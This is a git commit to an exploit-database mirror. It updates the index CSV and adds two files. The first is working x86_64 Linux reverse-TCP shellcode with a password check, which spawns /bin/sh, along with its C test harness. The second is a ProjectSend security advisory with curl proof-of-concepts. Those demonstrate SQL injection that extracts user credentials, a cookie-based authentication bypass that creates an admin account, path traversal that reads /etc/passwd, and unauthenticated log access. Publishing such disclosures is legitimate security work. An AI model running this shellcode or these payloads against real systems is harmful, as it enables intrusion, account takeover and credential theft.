DB: 2016-01-30
2 new exploits
This commit is contained in:
parent
958f5c3f9d
commit
bf22eb1691
3 changed files with 245 additions and 1 deletions
|
@ -32489,7 +32489,6 @@ id,file,description,date,author,platform,type,port
|
|||
36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
|
||||
36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
|
||||
36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
|
||||
36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi - Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0
|
||||
36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
|
||||
36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
|
||||
36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
|
||||
|
@ -35624,3 +35623,5 @@ id,file,description,date,author,platform,type,port
|
|||
39380,platforms/osx/dos/39380.c,"OS X - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0
|
||||
39381,platforms/osx/dos/39381.c,"OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0
|
||||
39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
|
||||
39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
110
platforms/lin_x86-64/shellcode/39383.c
Executable file
110
platforms/lin_x86-64/shellcode/39383.c
Executable file
|
@ -0,0 +1,110 @@
|
|||
/*---------------------------------------------------------------------------------------------------------------------
|
||||
/*
|
||||
*Title: tcp reverse shell with password polymorphic version 122 bytes
|
||||
*Author: Sathish kumar
|
||||
*Contact: https://www.linkedin.com/in/sathish94
|
||||
*Copyright: (c) 2016 iQube. (http://iQube.io)
|
||||
*Release Date: January 29, 2016
|
||||
*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
|
||||
*Tested On: Ubuntu 14.04 LTS
|
||||
*SLAE64-1408
|
||||
*Build/Run: gcc -fno-stack-protector -z execstack filename.c -o filename
|
||||
* ./bindshell
|
||||
* nc -l 4444 -vvv
|
||||
*
|
||||
|
||||
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
||||
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
|
||||
xor rsi, rsi
|
||||
mul rsi
|
||||
add rcx, 0x3
|
||||
push byte 0x2 ;pusing argument to the stack
|
||||
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
|
||||
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
|
||||
push byte 0x29 ; pushing the syscall number into the rax by using stack
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
; copying the socket descripter from rax to rdi register so that we can use it further
|
||||
|
||||
xchg rax, rdi
|
||||
|
||||
; server.sin_family = AF_INET
|
||||
; server.sin_port = htons(PORT)
|
||||
; server.sin_addr.s_addr = INADDR_ANY
|
||||
; bzero(&server.sin_zero, 8)
|
||||
; setting up the data sctructure
|
||||
|
||||
xor rax, rax
|
||||
push rax ; bzero(&server.sin_zero, 8)
|
||||
mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
|
||||
not ebx
|
||||
mov dword [rsp-4], ebx
|
||||
sub rsp , 4 ; adjust the stack
|
||||
push word 0x5c11 ; port 4444 in network byte order
|
||||
push word 0x02 ; AF_INET
|
||||
push rsp
|
||||
pop rsi
|
||||
|
||||
|
||||
push 0x10
|
||||
pop rdx
|
||||
push 0x2a
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
push 0x3
|
||||
pop rsi ; setting argument to 3
|
||||
|
||||
|
||||
|
||||
duplicate:
|
||||
dec esi
|
||||
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
|
||||
syscall
|
||||
jne duplicate
|
||||
|
||||
password_check:
|
||||
|
||||
push rsp
|
||||
pop rsi
|
||||
xor rax, rax ; system read syscall value is 0 so rax is set to 0
|
||||
syscall
|
||||
push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
|
||||
pop rax
|
||||
lea rdi, [rel rsi]
|
||||
scasd ; comparing the user input and stored password in the stack
|
||||
|
||||
|
||||
|
||||
execve: ; Execve format , execve("/bin/sh", 0 , 0)
|
||||
xor rsi , rsi
|
||||
mul rsi ; zeroed rax , rdx register
|
||||
push ax ; terminate string with null
|
||||
mov rbx , 0x68732f2f6e69622e ; "/bin//sh" in reverse order
|
||||
inc rbx
|
||||
add rcx, 2
|
||||
push rbx
|
||||
push rsp
|
||||
pop rdi ; set RDI
|
||||
push byte 0x3b ; execve syscall number (59)
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
unsigned char code[] =\
|
||||
"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x48\x83\xc1\x03\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68\x11\x5c\x66\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58\x48\x8d\x3e\xaf\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2e\x62\x69\x6e\x2f\x2f\x73\x68\x48\xff\xc3\x48\x83\xc1\x02\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", (int)strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
||||
|
133
platforms/php/webapps/39385.txt
Executable file
133
platforms/php/webapps/39385.txt
Executable file
|
@ -0,0 +1,133 @@
|
|||
Advisory ID: SGMA-16001
|
||||
Title: ProjectSend multiple vulnerabilities
|
||||
Product: ProjectSend (previously cFTP)
|
||||
Version: r582 and probably prior
|
||||
Vendor: www.projectsend.org
|
||||
Vulnerability type: SQL-injection, Auth bypass, Arbitrary File Access, Insecure Object Reference
|
||||
Risk level: 4 / 5
|
||||
Credit: filippo.cavallarin@wearesegment.com
|
||||
CVE: N/A
|
||||
Vendor notification: 2015-11-05
|
||||
Vendor fix: N/A
|
||||
Public disclosure: 2016-01-29
|
||||
|
||||
|
||||
ProjectSend (previously cFTP) suffers from multiple vulnerabilities:
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
|
||||
The following proof-of-concept demostrates this issue by downloading login credentials of registered users:
|
||||
|
||||
curl -X POST 'http://projectsend.local/manage-files.php?client_id=1' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22' --data "status=10' and 0 union select 0,1 ,'0) or 1 union select 0,1,concat(user,char(32),password),3,4,5,6,7,8,9 from tbl_users -- a',3,4,5,6,'7"
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "files" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
|
||||
The following proof-of-concept demostrates this issue by injecting a SLEEP command into the database engine:
|
||||
|
||||
curl -X POST 'http://projectsend.local/manage-files.php' --data 'files_actions=delete&do_action=&files%5B%5D=5) OR 1=sleep(10' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22'
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "selected_clients" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
|
||||
There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 63.
|
||||
|
||||
$selected_clients = $_POST['selected_clients'];
|
||||
$clients_to_get = mysql_real_escape_string(implode(',',array_unique($selected_clients)));
|
||||
$sql_user = $database->query("SELECT id, name FROM tbl_users WHERE id IN ($clients_to_get)");
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
|
||||
There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 146.
|
||||
|
||||
$status_filter = $_POST['status'];
|
||||
$cq .= " AND active='$status_filter'";
|
||||
[...]
|
||||
$sql = $database->query($cq);
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script process-zip-download.php suffers from a SQL-Injection vulnerability because the request parameter "file" is used to build a sql query without beeing properly sanitized.
|
||||
There is no POC available, but the vulnerability is easy to spot by looking at the source code.
|
||||
|
||||
$files_to_zip = explode(',',substr($_GET['file'], 0, -1));
|
||||
[...]
|
||||
foreach ($files_to_zip as $file_to_zip) {
|
||||
[...]
|
||||
$sql_url = $database->query('SELECT id, expires, expiry_date FROM tbl_files WHERE url="' . $file_to_zip .'"');
|
||||
|
||||
|
||||
|
||||
- SQL Injection
|
||||
|
||||
The script home-log.php suffers from a SQL-Injection vulnerability because the request parameter "action" is used to build a sql query without beeing properly sanitized.
|
||||
There is no POC available, but the vulnerability is easy to spot by looking at the source code.
|
||||
|
||||
$log_action = $_GET['action'];
|
||||
$log_query = "SELECT * FROM tbl_actions_log";
|
||||
if (!empty($log_action)) {
|
||||
$log_query .= " WHERE action = '$log_action'";
|
||||
|
||||
|
||||
|
||||
- Authentication Bypass
|
||||
|
||||
An Authenticaton Bypass vulnerability has been discovered in multiple pages. By adding a cookie to request it is possible to bypass certain authentication checks and gain access to protected resources.
|
||||
The following proof-of-concepts are available:
|
||||
|
||||
Lists all registered users:
|
||||
curl http://projectsend.local/users.php -H 'Cookie: userlevel=9'
|
||||
|
||||
Add an Admin user to the database:
|
||||
curl http://projectsend.local/users-add.php -H 'Cookie: userlevel=9' -X POST --data 'add_user_form_name=necci&add_user_form_email=poplix@papuasia.org&add_user_form_level=9&add_user_form_user=necci&add_user_form_active=1&add_user_form_pass=123456'
|
||||
|
||||
Read file statsictics:
|
||||
curl http://projectsend.local/home.php -H 'Cookie: userlevel=9'
|
||||
|
||||
Read file details:
|
||||
curl http://projectsend.local/edit-file.php?file_id=1 -H 'Cookie: userlevel=9'
|
||||
|
||||
Bypass authentication:
|
||||
curl 'http://projectsend.local/process-zip-download.php' -H 'Cookie: userlevel=8'
|
||||
|
||||
|
||||
- Arbitrary File Download
|
||||
|
||||
The page process-zip-download.php fails to restrict access to local files. By injecting a path traversal vector into the "file" parameter it is possible to read an arbitrary file from the server.
|
||||
By combining this vulnerability with the Authentication Bypass affecting the same file, is possible for a non-authenticated user to gain access to protected data.
|
||||
The followinf proof-of-concept is available.
|
||||
|
||||
curl 'http://projectsend.local/process-zip-download.php?file=../../../../../../../../etc/passwdd' -H 'Cookie: userlevel=8' > ttt.zip
|
||||
|
||||
|
||||
- Insecure Direct Object References
|
||||
|
||||
The page actions.log.export.php fails to perform authentication checks so it's possible for anyone to access logs data.
|
||||
The followinf proof-of-concept is available.
|
||||
|
||||
curl http://projectsend.local/includes/actions.log.export.php
|
||||
|
||||
|
||||
Solution
|
||||
No solution is available at the time of writing.
|
||||
The vendor has been contacted about three months before the public disclosure, but he stopped responding after we sent him our report.
|
||||
|
||||
|
||||
References
|
||||
https://www.wearesegment.com/research/Projectsend_multiple_vulnerabilities
|
||||
http://www.projectsend.org
|
||||
|
||||
|
||||
Filippo Cavallarin
|
||||
https://wearesegment.com
|
Loading…
Add table
Reference in a new issue